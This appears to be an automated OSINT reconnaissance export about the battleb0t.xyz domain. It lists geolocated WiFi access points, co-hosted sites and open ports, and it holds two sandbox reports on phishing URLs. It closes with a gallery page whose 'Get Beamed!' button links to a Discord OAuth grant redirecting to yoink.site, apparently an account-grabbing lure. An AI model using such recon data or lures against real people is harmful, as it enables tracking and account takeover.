| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.224): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Tacklebox AirNet (Net ID: 00:02:2D:0D:4F:2B) | 37.7642, -122.3993 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hollyhome (Net ID: 00:04:5A:FD:2E:C9) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.219 | 104.196.30.220 |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00d2.github.io |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 2 | 0 | 3 | 0 | None | https://github.com/Altpapier/SkyHelperAPI/tree/master/examples | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:44:10 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | MariaDB MariaDB 10.5.19 | 87.248.157.102 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Gettr (Category: social)
https://gettr.com/user/login | login |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:42:61) | 41.8781, -87.6298 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | P2d8T7f2d$ (Net ID: 00:18:0A:DF:7D:60) | 32.8608, -79.9746 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.216): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:04:E2:FB:95:10) | 39.0469, -77.4903 |
| 2023-05-12 02:53:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fhome-docs.webflow.io%2F', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:7648:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7648:304:WilStaging_02"\n "Local\\SM0:7648:120:WilError_01"\n "SM0:7648:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "138.91.254.96:443"\n "172.66.43.150:443"\n "151.101.2.132:443"\n "35.186.254.174:443"\n "65.8.158.125:443"\n "65.8.165.43:443"\n "20.50.201.201:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.salesflare.com"\n "d3e54v103j8qbb.cloudfront.net"\n "home-docs.webflow.io"\n "llink.to"\n "self.events.data.microsoft.com"\n "track.salesflare.com"\n "uploads-ssl.webflow.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.148.664.8402708624568094443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000148]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\148_306407055\\edge_driver.js]- [targetUID: 00000000-00000148]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00000148]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00000148]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00000148]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\148_306407055\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00000148]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\148_306407055\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00000148]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00000148]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00000148]\n "000014.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000014.ldb]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00000148]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00000148]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\148_431447688\\edge_autofill_field_data.json]- [targetUID: 00000000-00000148]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00000148]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00000148]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: N/A]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- Location: [%TEMP%\\148_306407055\\json\\wallet\\wallet-checkout-eligible-sites-pre-stable.json]- [targetUID: 00000000-00000148]\n "Web Data" has type "SQLi | 185.199.109.153 |
| 2023-05-12 02:56:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://keyzstoreoracle.org/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dbc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dbc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_dbc_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "IsoScope_dbc_IE_EarlyTabStart_0xf74_Mutex"\n "IsoScope_dbc_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3516"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_dbc_ConnHashTable<3516>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"keyzstoreoracle.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:80"\n "96.6.31.32:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"keyzstoreoracle.org"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "GNHNKDR2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GNHNKDR2.txt]- [targetUID: 00000000-00003516]\n Dropped file: "872UMPTE.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\872UMPTE.txt]- [targetUID: 00000000-00003516]\n Dropped file: "P1JMAX91.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P1JMAX91.txt]- [targetUID: 00000000-00003516]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DFD0369D8D88B34BD1.TMP" has type "data"- Location: [%TEMP%\\~DFD0369D8D88B34BD1.TMP]- [targetUID: 00000000-00003516]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003516]\n "_E5961C44-4C47-11ED-BAE3-080027B2FD56_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "GNHNKDR2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GNHNKDR2.txt]- [targetUID: 00000000-00003516]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 frames 3"- [targetUID: N/A]\n "ErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003516]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003516]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003516]\n "~DF4BEE67FCFB6399A9.TMP" has type "data"- Location: [%TEMP%\\~DF4BEE67FCFB6399A9.TMP]- [targetUID: 00000000-00003516]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003516]\n "872UMPTE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\872UMPTE.txt]- [targetUID: 00000000-00003516]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF2DD02FB8845D7E5E.TMP" has type "data"- Location: [%TEMP%\\~DF2DD02FB8845D7E5E.TMP]- [targetUID: 00000000-00003516]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://keyzstoreoracle.org/"\n Pattern match: "http://keyzstoreoracle.org"\n Heuristic match: "keyzstoreoracle.org"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:26ef1154-5995-4d24-ad78-ef0b04f11587\nX-Response-Cache-Status: True\nExpires: Sat, 15 Oct 2022 06:47:48 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Sat, 15 Oct 2022 06:47:48 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'16/88 reputation engines marked "http://keyzstoreoracle.org/" as malicious (18% detection rate)\n 16/88 reputation engines marked "http://keyzstoreoracle.org" as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'16/88 Antivirus vendors marked sample as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_ | 104.196.30.220 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitec-a197d9 (Net ID: 00:01:8E:A1:97:D8) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.19): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01039402468.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TSMD 5 (Net ID: 00:02:6F:FD:8B:6F) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:32:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.11:8443 | 188.114.97.0/24 |
| 2023-05-12 03:01:31 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://funny.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'Netlify']}, u'RedirectLocation': {u'string': [u'https://funny.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'x-nf-request-id']}, u'IP': {u'string': [u'34.148.147.18']}}}, {}] | funny.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache: MISS | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet4862 (Net ID: 00:01:36:5B:48:60) | 37.7813933,-122.3918002 |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | akashpmani.github.io |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
